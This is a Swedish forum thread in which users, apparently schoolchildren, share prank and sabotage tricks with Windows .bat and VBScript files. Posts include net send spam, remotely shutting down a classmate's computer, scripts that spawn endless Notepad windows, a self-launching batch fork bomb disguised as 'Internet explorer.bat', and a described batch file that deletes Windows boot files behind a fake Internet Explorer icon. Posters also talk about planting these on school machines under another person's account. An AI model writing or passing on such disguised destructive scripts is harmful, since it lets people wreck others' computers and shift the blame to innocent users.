Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem

haha, det är ju bara att dra ur sladden om det börjar ryka

Permalänk

Re: skicka netsend?

Citat:

Ursprungligen inskrivet av dInmIn
nån som kan förklara varför det inte funkar att skicka netsend?

jag har gjort en .bat fil som det står följande i:

net send * error bla bla

men det händer inte nått på någon av kompisarnas datorer, blir så förbannad när det inte funkar.
kan det vara för att min dator som är en lånedator från skolan är med i en domän som kompisarna inte är? jag vet inte... fattar inte mycket av dos

net send fungerar bara om man ligger i samma arbetsgrupp.... asså funkar inte på hemma nätverk. men fungerar tex på skolor.

Citat:

Citat:
Citat:
Citat:
Citat:
Citat:
Citat:
Permalänk
Citat:

Ursprungligen inskrivet av darcyber1234
net send fungerar bara om man ligger i samma arbetsgrupp.... asså funkar inte på hemma nätverk. men fungerar tex på skolor.:arrow:

Arbetsgrupp kan man ju i samma även fast det är hemnätverk?

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem

funkar inte i SP2

Permalänk

slå på messenger tjänsten då funkar det

Visa signatur

Asus: Bara vi har äkta USB 3.0 och SATA 6,0 Gbps
[img]http://valid.canardpc.com/cache/banner/w47khy.png[/img]

Permalänk
Medlem

det här med shutdown -a [ip nummer]. bara en fråga: om alla datorer i ett nätverk sänder sina namn (min heter UATG508) genom wlan eller bluetooth, går det på nåt sett söka efter det och få fram ip nummer?. tex min klass sitter i klassrummet, min polare har en redovisning med datorn och jag söker efter hans dator, får fram ip och skickar kommandot som stänger av datorn.

Visa signatur

Laptop: Thinkpad W540, i7-4910QM, 32GB, 1TB, Windows 10
MAC: Macbook Pro 13, 16GB, Intel HD4000, Crucial 240GB, 11.6 Big Sur

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av ares93
det här med shutdown -a [ip nummer]. bara en fråga: om alla datorer i ett nätverk sänder sina namn (min heter UATG508) genom wlan eller bluetooth, går det på nåt sett söka efter det och få fram ip nummer?. tex min klass sitter i klassrummet, min polare har en redovisning med datorn och jag söker efter hans dator, får fram ip och skickar kommandot som stänger av datorn.

Vore förbaskat kul om det gick!

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Ala_95
Vore förbaskat kul om det gick!

Dock ett enormt säkerhetshål, alltså fungerar det inte.

Visa signatur

Citera om du vill ha svar.

Permalänk
Medlem

skriv
ping datornamn
i cmd
glöm inte att messenger tjänsten måste vara påslagen på den datorn också.

@muppens
jag lyckades stänga av min grannes dator en gång..

Permalänk
Medlem

tackar! ska genast provas med netbooken nu är det payback time
EDIT: nope...

Visa signatur

Permalänk
Citat:

Ursprungligen inskrivet av 22223

set wshshell = wscript.createobject("wscript.shell") dim div,i,x x = 4 + i div = 600000 for i=1 to x wscript.sleep div wshshell.run "notepad.exe" div = div /2 x = 4 * i * 1000 next

Börjar med ett tio minuters delay, sen delas delayet hela tiden med två.
så det blir tio, fem, två och en halv osv. till slut kommer det upp massor av notepad ^^

Hur gör man för att få t.ex. Google Chorme att öppna sig så där och öppna en hemsida samtidigt? Helst i bakgrunden
Fast utan att tiden halveras då.

Visa signatur

cat_fish_1:
"fläktarna ska vi ju inte tala om, astmatiker med ett sugrör hade blåst bättre."

Permalänk
Citat:

Ursprungligen inskrivet av RymdSegel
Hur gör man för att få t.ex. Google Chorme att öppna sig så där och öppna en hemsida samtidigt? Helst i bakgrunden

Byt ut "notepad.exe" mot hemsidan typ, www.google.se

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av KurreKula
Byt ut "notepad.exe" mot hemsidan typ, www.google.se

det borde vara chrome.exe i så fall. tvivlar på att den öppnar url...

Visa signatur

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av RymdSegel

set wshshell = wscript.createobject("wscript.shell")
do
wscript.sleep 60000
wshshell.run "www.example.com"
loop

Permalänk
Citat:

Ursprungligen inskrivet av ares93
det borde vara chrome.exe i så fall. tvivlar på att den öppnar url...

Tvivla på du men den öppnar url

Visa signatur

MovieDatabase

Permalänk
Inaktiv

vill man jävlas riktigt mycket så gör man en .bat som tar bort NTLDR, boot.ini och NTDETECT.COM och sedan stänger av datorn! Plus att man gömmer filen nånstans svårt att hitta, skapar en genväg och byter namn och ikon till Internet Explorer och sedan när nån noob ska in på internet, baam hans dator är körd bara att installera om windows

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av bushman18
vill man jävlas riktigt mycket så gör man en .bat som tar bort NTLDR, boot.ini och NTDETECT.COM och sedan stänger av datorn! Plus att man gömmer filen nånstans svårt att hitta, skapar en genväg och byter namn och ikon till Internet Explorer och sedan när nån noob ska in på internet, baam hans dator är körd bara att installera om windows

Det är ju bara drygt ju!
Undra vad Micha och Peter tycker om man skulle göra så på skolan...

Visa signatur

O2+ODAC - Denon AH-D2000

Permalänk
Citat:

Inte ens roligt :/

Visa signatur

MovieDatabase

Permalänk
Inaktiv
Citat:

Ursprungligen inskrivet av Ala_95
Det är ju bara drygt ju!
Undra vad Micha och Peter tycker om man skulle göra så på skolan...

meningen är att det ska vara drygt. ja du ska nog inte göra det på ditt konto om du nu ska göra det på skolan för du lär få en massa skit för dom övervakar ju allt man gör i princip.

Permalänk
Medlem
Citat:

meningen är att det ska vara drygt. ja du ska nog inte göra det på ditt konto om du nu ska göra det på skolan för du lär få en massa skit för dom övervakar ju allt man gör i princip.

Jo, kan ju alltid göra det på någon annans men... Då råkar ju den ut för det

Visa signatur

O2+ODAC - Denon AH-D2000

Permalänk
Citat:

Ursprungligen inskrivet av 22223

set wshshell = wscript.createobject("wscript.shell") dim div,i,x x = 4 + i div = 600000 for i=1 to x wscript.sleep div wshshell.run "notepad.exe" div = div /2 x = 4 * i * 1000 next

Börjar med ett tio minuters delay, sen delas delayet hela tiden med två.
så det blir tio, fem, två och en halv osv. till slut kommer det upp massor av notepad ^^

hur stänger jag av? ska nämligen lägga en i skolan, och vet inte vad jag ska göra om jag torskar, och inte får stopp på den!

Permalänk
Medlem

När det fortfarande är några sekunders delay kan du ju stänga av processen "wscript.exe" men när det går för snabbt så är det bara att stänga av datorn ^^

Permalänk
Medlem

Prova att göra ett textdokument och skriv start typ flera tusen gånger och spara den som T.ex. "Internet explorer.bat" . det är det viktigaste att du skriver .bat efter det du namn ger det.. GL

Permalänk
Inaktiv

imjohannes

riktigt jobbigt min dator har gått sönder så sitter vid reservdatorn med en hdd på 18 GB sen läste jag inte klart allt och ordnade denna fil senhadde jag helt fullt på hdd:n så jag läste vidare vad du skrivit blev riktigt less. menfick bort allt till slut:)

Permalänk
Skrivet av Alex94:

Prova att göra ett textdokument och skriv start typ flera tusen gånger och spara den som T.ex. "Internet explorer.bat" . det är det viktigaste att du skriver .bat efter det du namn ger det.. GL

Eller så skapar man bara en loop.

Visa signatur

<signatur>|| i7-930 || Asus P6X58D-E || 6GB Corsair xms3 || HD 6950 || Noctua NH-U12P SE2 || OCZ Revodrive 80GB || Samsung Spinpoint F3 500GB || EcoGreen F2 500GB || WD Blue 500GB || Corsair HX650W || Lian Li PC-v1020 || W7 Home Premium || Samsung SyncMaster EX2200||</signatur>

Permalänk
Medlem

Tjena

För att flytta en fil kallad "filen" från samma plats som jag kör denna batfil till en av mig vald plats, i detta fall en mapp vid namn "Mappen, så kan man använda följande kod:

@echo off
copy filen "C:\Mappen"

Men jag vill istället kopiera ALLA filer vars filnamn innehåller ordet "liten" på hela datorn.
Alltså både filer som heter "Liten bild", "litenbilden" mm.

Men först måste det ju skapas en mapp med namn "Mappen" i C:\

Någon som kan detta?
mycket tacksam för svar!

Permalänk

Otestat, testa lite i mindre mappar

C: CD C: MD Mappen XCOPY *liten* Mappen /cherkyi

Visa signatur

MovieDatabase

Permalänk
Medlem

står att det gick inte att göra en kopiering
trots att jag har en wordpad dokument döpt till "litengris"

Permalänk
Medlem

En liten sak som är mäkta irriterande

Start namnpåbatfilen.bat

Permalänk
Medlem

Lånar tråden! Detta är väldigt off topic, men hur skapar man en tråd?